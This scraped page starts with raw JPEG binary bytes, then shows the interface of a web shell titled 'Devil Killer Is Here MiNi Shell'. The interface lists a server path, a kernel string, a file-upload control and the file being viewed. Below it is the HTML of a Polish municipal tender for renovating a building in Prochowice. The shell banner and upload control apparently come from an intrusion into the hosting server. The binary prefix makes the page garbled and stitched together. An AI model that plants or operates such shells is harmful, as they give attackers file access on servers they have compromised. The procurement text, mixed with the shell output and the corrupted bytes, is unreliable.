JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20240328/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20240328/0026346001-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Remont i przebudowa istniejącego budynku usługowego wraz z zewnętrzną kanalizacją deszczową przy ul. Kochanowskiego 8a w Prochowicach - II ogłoszenie </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Prochowice</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 390647512</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Rynek 1</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Prochowice</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">59-230</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">dolnośląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL516 - Legnicko-głogowski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">e.rogos@prochowice.com</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://bip.prochowice.com/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Remont i przebudowa istniejącego budynku usługowego wraz z zewnętrzną kanalizacją deszczową przy ul. Kochanowskiego 8a w Prochowicach - II ogłoszenie </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-806a42dd-ecd9-11ee-b4e0-4ac387c144e3</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00263460</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-03-28</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00056443/02/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.4 Remont i przebudowa istniejacego budynku usługowego wraz z zewnętrzną kanalizacją deszczową przy ul. Kochanowskiego 8A w Prochowicach</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> www.bip.prochowice.com <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">1. Dokumentacja postępowania jest i w trakcie postępowania będzie upubliczniona na<br/>stronie zamowienia.sidaspzp.pl pod nazwą postępowania wskazaną w tytule SWZ oraz na stronie BIP<br/>https://bip.prochowice.com/zamowienia-publiczne.html pod nazwą postępowania wskazaną w tytule SWZ.<br/>2. Komunikacja między Zamawiającym, a wykonawcami odbywa się przy użyciu środków komunikacji elektronicznej w rozumieniu<br/>ustawy z dnia 18 lipca 2002 r. o świadczeniu usług drogą elektroniczną (Dz.U. z 2020 r. poz. 344).</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. Zamawiający, zgodnie z § 2 ust. 1<br/>rozporządzenia Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz<br/>wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie<br/>zamówienia publicznego lub konkursie (dalej zwane „Rozporządzenie”) zaleca podpisywanie dokumentów PDF formatem PAdES.<br/>Dodatkowo informuje, że:<br/>1) pliki podpisane przy pomocy podpisu zewnętrznego XAdES należy załączać wraz z plikiem podpisu,<br/>2) formularz oferty podpisany przy użyciu podpisu zewnętrznego XAdES należy dodać w jeden z poniższych sposobów:<br/>a) z poziomu zakładki „Moje pliki” w miejscu do dodania pliku oferty należy umieścić plik, który był podpisywany, a plik z podpisem<br/>należy dodać oddzielnie jako załącznik,<br/>b) spakować jako plik oferty i plik z podpisem do paczki „zip” i dołączyć z poziomu zakładki „Moje pliki” w miejscu do dodania pliku<br/>oferty.<br/>2. Zamawiający, zgodnie z § 11 ust. 2 Rozporządzenia określa niezbędne wymagania sprzętowo-aplikacyjne umożliwiające pracę na<br/>portalu tj. niezbędne wymagania sprzętowo-aplikacyjne:<br/>1) dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 1 Mb/s;<br/>2) komputer klasy PC lub MAC o następującej konfiguracji: pamięć ram min. 3 GB RAM, procesor 1500 MHz lub lepszy, jeden z<br/>systemów operacyjnych Linux Kernel 4.0, Windows 7 i MacOS 10.12 – lub nowsze wersje;<br/>3) zainstalowane przeglądarki internetowe w najnowszych wersjach: Firefox, Chrome, Opera;<br/>4) włączona obsługa JavaScript;<br/>5) zainstalowany program do obsługi formatów .pdf np. Acrobat Reader;<br/>6) dopuszczalne formaty przesłanych danych tj. plików o wielkości do 100 MB to: png, jpg, jpeg, gif, doc, docx, xls, xlsx, ppt, pptx,<br/>odt, ods, odp, odf, pdf, zip, 7zip, txt, ath, xml, dwg, xades, tar, 7z, eml, msg;<br/>7) informacja odnośnie kodowania i czasu odbioru danych:<br/>a) plik załączony przez wykonawcę na portalu i zapisany nie jest widoczny dla Zamawiającego, ponieważ w systemie występuje jako<br/>plik zaszyfrowany,<br/>b) jako czas złożenia oferty przez portal pzp przyjmuje się moment otrzymania żądania przez serwer po kliknięcia w opcję „Złóż<br/>ofertę”. Czas jest prezentowany w (hh:mm:ss) zgodnie ze strefą czasową ustawioną na komputerze.<br/>3. Czas serwera jest synchronizowany z czasem udostępnionym przez Główny Urząd Miar.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Klauzula RODO zawarta w dokumentach zamówienia.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Klauzula RODO zawarta w dokumentach zamówienia.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">IGP.271.4.2024</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest remont i przebudowa istniejącego budynku usługowego, zlokalizowanego w Prochowicach przy ulicy Kochanowskiego 8A. W bezpośrednim sąsiedztwie budynku znajduje się galeria handlowa z parkingiem ogólnodostępnym. Główne wejście do budynku - od strony ulicy Kochanowskiego. Przyłącza dostępne w ulicy Kochanowskiego. Teren działki płaski . <br/>Zamierzony sposób użytkowania oraz program użytkowy obiektu budowlanego: Budynek jest obecnie nieużytkowany. Przyjęto założenie, że zasadnicza bryła budynku pozostanie bez zmian, a nieużytkowane obecnie pomieszczenia zostaną przystosowane do nowej funkcji w głównej mierze biurowej. <br/>Budynek zostanie również przystosowany dla osób niepełnosprawnych poprzez wyposażenie w dźwig osobowy, lokalizację w budynku toalety dla osób niepełnosprawnych oraz likwidację barier architektonicznych. <br/>PIWNICA Piwnica ma nienormatywną wysokość. Nie zakłada się ingerencji w ściany piwnicy. Pomieszczenia zostaną przystosowane do funkcji pomocniczej. <br/>PARTER Obecnie parter nieużytkowany przystosowany zostanie do funkcji biurowej. Lokalizuję się tutaj salę ślubów z poczekalnią i zapleczem, oraz toaletę ogólnodostępną. Zakłada się wyburzenie części ścian w celu otwarcia przestrzeni, lokalizację szybu windowego oraz toalety dla niepełnosprawnych i zaplecza socjalnego. Zdecydowano się na wykonanie dodatkowego wejścia do budynku bezpośrednio z parkingu, co umożliwi łatwiejszą komunikację osób korzystających z sąsiedzkiej galerii handlowej. Lokalizacja windy w bezpośrednim sąsiedztwie klatki schodowej zapewni dostępność budynku dla osób niepełnosprawnych <br/>PIĘTRO Obecnie piętro nieużytkowane przystosowane zostanie do funkcji biurowej. Lokalizuje się tutaj toaletę oraz zaplecze socjalne dla pracowników oraz cztery pomieszczenia biurowe. <br/>PODDASZE Na poddaszu lokalizuje się pomieszczenie biurowe oraz salę konferencyjną z zapleczem socjalnym oraz toaletą, pom. Pomocnicze, oraz kotłownię gazową.<br/><br/>Zakres przebudowy i remontu :<br/>Remont i przebudowa budynku ma na celu nadanie nowej funkcji obiektowi, w którym będą świadczone usługi społeczne m.in. zlokalizowany zostanie w nim Miejsko-Gminny Ośrodek Pomocy Społecznej oraz sala ślubów Urzędu Stanu Cywilnego. Obiekt będzie dostosowany dla osób niepełnosprawnych. W ramach inwestycji wykonany zostanie remont : <br/>1.	elewacji północnej i wschodniej w tym m.in. docieplenie ścian, wykonanie zabezpieczeń spękań murów, odtworzenie tynków strukturalnych, naprawa istniejących tynków, wykonanie czyszczenia elewacyjnej cegły klinkierowej, odtworzenie okien, odtworzenie gzymsów oraz innych detali architektonicznych, renowacja parapetów zewnętrznych z cegły klinkierowej, wymiana stolarki okiennej, renowacja drzwi wejściowych i balkonowych, wymiana rynien i rur spustowych; <br/>2.	elewacji południowej i zachodniej w tym m.in. docieplenie ściany i wykonanie nowych tynków mineralnych, wykonanie wyburzeń oraz przemurowań pod nowe otwory okienne i drzwiowe, montaż nowej stolarki okiennej, montaż nowych drzwi zewnętrznych;<br/>3.	piwnic w tym m.in. skucie wszystkie tynków i osuszenie ścian;<br/>4.	dachu, w tym m.in. wykonanie nowej konstrukcja więźby dachowej i pokrycia dachu wraz z montażem stopni dachowych, ław kominiarskich, płotków śniegowych; <br/>5.	wykonanie nowych stropów; <br/>6.	udrożnienie i odtworzenie wentylacji grawitacyjnej; <br/>7.	odkopanie fundamentów zaizolowane izolacją przeciwwilgociową; <br/>8.	rozebranie schodów wewnętrznych i wykonanie żelbetowych. <br/>9.	wyposażenie obiektu w windę niezbędną dla obsługi beneficjentów Ośrodka Pomocy Społecznej;<br/>Podstawowe założenia do kalkulacji podano w przedmiarach robót, szczegółowy opis przedmiotu zamówienia zawiera dokumentacja techniczna stanowiąca Zał. Nr 6a do SWZ tj.: dokumentacja projektowa pn. „Remont i przebudowa istniejącego budynku usługowego” w tym: projekt budowlany zatwierdzony decyzją pozwolenia na budowę, projekty wykonawcze, przedmiary robót oraz Specyfikacje techniczne wykonania i odbioru robót.<br/>Wszystkie roboty budowlane opisane dokumentacją stanowiącą SWZ Wykonawca zobowiązany jest wykonać zgodnie z dokumentacją i zasadami wiedzy technicznej, sztuką budowlaną, obowiązującymi norami i przepisami prawa, na warunkach określonych w projekcie umowy stanowiącej Zał. nr 1 do SWZ. <br/>Dokumentacja budowlana dotycząca zamówienia:<br/>Projekt budowlany wraz z decyzją pozwolenia na budowę – Decyzja nr 957/21 Starosty Legnickiego z dnia 22 grudnia 2021r. pn. „Remont i przebudowa istniejącego budynku usługowego” oraz pozwolenia na prowadzenie prac konserwatorskich i restauratorskich oraz robót budowalnych przy zabytku wpisanym do rejestru zabytków – Decyzja Nr 524/2021 Dolnośląskiego Wojewódzkiego Konserwatora Zabytków we Wrocławiu z dnia 24 czerwca 2021r,<br/>1)	Projekt architektoniczno-budowlany,<br/>2)	Projekt techniczny, <br/>UWAGA! <br/>Projekt techniczny stanowi uzupełnienie projektu architektonicznego budowlanego zatwierdzonego przez urząd. Rozwiązania przedstawione w niniejszym opracowaniu należy rozpatrywać łącznie z częścią PAB. Część architektoniczna jako zaktualizowana po opracowaniu projektu technicznego pozostałych branż zawiera najbardziej aktualne rysunki oraz część opisową wymaganą zgodnie z Rozporządzeniem Ministra Rozwoju z dnia 11.09.2020 w sprawie szczegółowego zakresu i formy projektu budowlanego.<br/>Załączony projekt techniczny został opracowany w związku ze zmianą sposobu użytkowania obiektu – pod potrzeby MGOPS oraz Sali Ślubów.<br/>3)	Projekt zagospodarowania terenu,<br/>4)	Przedmiary robót,<br/>5)	Specyfikacja techniczna wykonania i odbioru robót,<br/>6)	Załączniki formalne.<br/><br/>UWAGA : w przedmiarze robót budowlanych poz. 232.d.11 – 237.d.11, przedmiarze robót elektrycznych poz. 56d.4 – 58d.4 oraz wykończenie ścian, sufitów i posadzek dotyczą elementów wykończenia, których wizualizacje są zawarte w projekcie wnętrz stanowiącym zał. Nr 6b do SWZ. Wykonawca zobowiązany jest do skalkulowania w cenie oferty i do wykonania wskazanych pozycji oraz pozycji wykończeniowych ścian, sufitów i posadzek zgodnie z projektem wnętrz. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45443000-4 - Roboty elewacyjne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45452100-1 - Piaskowanie fasady budynków</p> <p class="mb-0">45453100-8 - Roboty renowacyjne</p> <p class="mb-0">45260000-7 - Roboty w zakresie wykonywania pokryć i konstrukcji dachowych i inne podobne roboty specjalistycze</p> <p class="mb-0">45300000-0 - Roboty instalacyjne w budynkach</p> <p class="mb-0">45310000-3 - Roboty instalacyjne elektryczne</p> <p class="mb-0">45330000-9 - Roboty instalacyjne wodno-kanalizacyjne i sanitarne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">13 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres udzielonej gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Opis warunków udziału w postępowaniu :<br/>1)	Zdolność do występowania w obrocie gospodarczym<br/>Zamawiający żąda od wykonawcy prowadzącego działalność gospodarczą lub zawodową dokumentu potwierdzającego, że jest wpisany do jednego z rejestrów zawodowych lub handlowych, prowadzonych w kraju, w którym ma siedzibę lub miejsce zamieszkania, wystawionego nie wcześniej niż 6 miesięcy przed jego złożeniem. <br/>2)	Uprawnienia do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów;<br/>Zamawiający nie stawia wymagań w zakresie spełniania tego warunku.<br/>3)	Sytuacja ekonomicznej lub finansowej;<br/>Zamawiający wymaga, aby Wykonawca wykazał że jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę gwarancyjną nie mniejszą niż 2 000 000,00 złotych na okres realizacji zamówienia. Dokument musi być ważny na dzień składania ofert.<br/>4)	Zdolność techniczna lub zawodowa :<br/><br/>1)	Wykonawca musi posiadać niezbędną wiedzę i doświadczenie tj. musi udokumentować, że w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, należycie wykonał, co najmniej dwa zamówienia o wartości, co najmniej 1 500 000,00 PLN każde, obejmujące roboty rodzajowo takie same lub podobne do robót stanowiących przedmiot niniejszego postępowania, wykonane w ramach remontu zabytkowego budynku użyteczności publicznej lub zabytkowego budynku zamieszkania zbiorowego. Pojęcia: budynek, budowa, przebudowa, remont należy rozumieć zgodnie z definicjami podanymi w §3 ustawy z dnia 7 lipca 1994r. Prawo budowlane (Dz.U z 2020r. poz.1333 z późn.zm). Pojęcia budynków użyteczności publicznej i zamieszkania zbiorowego, wg definicji podanej w § 3 Rozporządzenia Ministra Infrastruktury z dnia 12 kwietnia 2002r. w/s warunków technicznych, jakim powinny odpowiadać budynki i ich usytuowanie (Dz.U. z 2019r poz. 1065 z póź.zm). <br/>2)	Wykonawca musi dysponować osobami zdolnymi do wykonania zamówienia, z kwalifikacjami, doświadczeniem, uprawnieniami odpowiednimi do funkcji, jakie zostaną im powierzone. Wykonawca musi wykazać, że do wykonania zamówienia dysponuje co najmniej dwoma osobami do pełnienia niżej wymienionych funkcji, które spełniają następujące wymagania :<br/>a)	kierownik budowy posiadający uprawnienia budowlane do kierowania robotami budowlanymi w specjalności konstrukcyjno-budowlanej, doświadczenie zawodowe: co najmniej 5 lat pracy od uzyskania uprawnień oraz uprawnienia wykonawcze do zabytków rejestrowych, zgodnie z wymogami art.37c ustawy o ochronie zabytków i opiece nad zabytkami. <br/>„Art. 37c Robotami budowlanymi kieruje albo nadzór inwestorski wykonuje, przy zabytkach nieruchomych wpisanych do rejestru osoba, która posiada uprawnienia budowlane określone przepisami Prawa budowlanego oraz która przez co najmniej 18 miesięcy brała udział w robotach budowlanych prowadzonych przy zabytkach nieruchomych wpisanych do rejestru lub inwentarza muzeum będącego instytucją kultury.”<br/>b)	osoba do kierowania pracami konserwatorskimi, restauratorskimi albo samodzielnego ich wykonywania przez osobę zgodnie z wymogami art.37c ustawy o ochronie zabytków i opiece nad zabytkami. <br/>„Art. 37a ustawy o ochronie zabytków i opiece nad zabytkami: „1. Pracami konserwatorskimi, pracami restauratorskimi lub badaniami konserwatorskimi, prowadzonymi przy zabytkach wpisanych do rejestru kieruje osoba, która ukończyła studia drugiego stopnia lub jednolite studia magisterskie, w zakresie konserwacji i restauracji dzieł sztuki lub konserwacji zabytków oraz która po rozpoczęciu studiów drugiego stopnia lub po zaliczeniu szóstego semestru jednolitych studiów magisterskich przez co najmniej 9 miesięcy brała udział w pracach konserwatorskich, pracach restauratorskich lub badaniach konserwatorskich, prowadzonych przy zabytkach wpisanych do rejestru, inwentarza muzeum będącego instytucją kultury lub zaliczanych do jednej z kategorii, o których mowa w art. 14a ust. 2. <br/>2. W dziedzinach nieobjętych programem studiów wyższych, o których mowa w ust. 1, pracami konserwatorskimi, pracami restauratorskimi lub badaniami konserwatorskimi, prowadzonymi przy zabytkach wpisanych do rejestru albo na Listę Skarbów Dziedzictwa, kieruje osoba, która posiada: <br/>1) świadectwo ukończenia szkoły średniej zawodowej oraz tytuł zawodowy albo wykształcenie średnie lub średnie branżowe i dyplom potwierdzający posiadanie kwalifikacji zawodowych w zawodach odpowiadających danej dziedzinie lub <br/>2) dyplom mistrza w zawodzie odpowiadającym danej dziedzinie <br/>- oraz która przez co najmniej 4 lata brała udział w pracach konserwatorskich, pracach restauratorskich lub badaniach konserwatorskich, prowadzonych przy zabytkach wpisanych do rejestru, na Listę Skarbów Dziedzictwa, do inwentarza muzeum będącego instytucją kultury lub innych zabytkach zaliczanych do jednej z kategorii, o których mowa w art. 14a ust. 2” <br/>c)	kierownik robót instalacyjnych - 1 osoba posiadająca: uprawnienia budowlane do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń wodociągowych i kanalizacyjnych, <br/><br/>d)	kierownik robót elektrycznych - 1 osoba posiadająca: uprawnienia budowlane do kierowania robotami budowlanymi w specjalności sieci elektrycznych, instalacji i urządzeń elektrycznych i elektroenergetycznych. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span 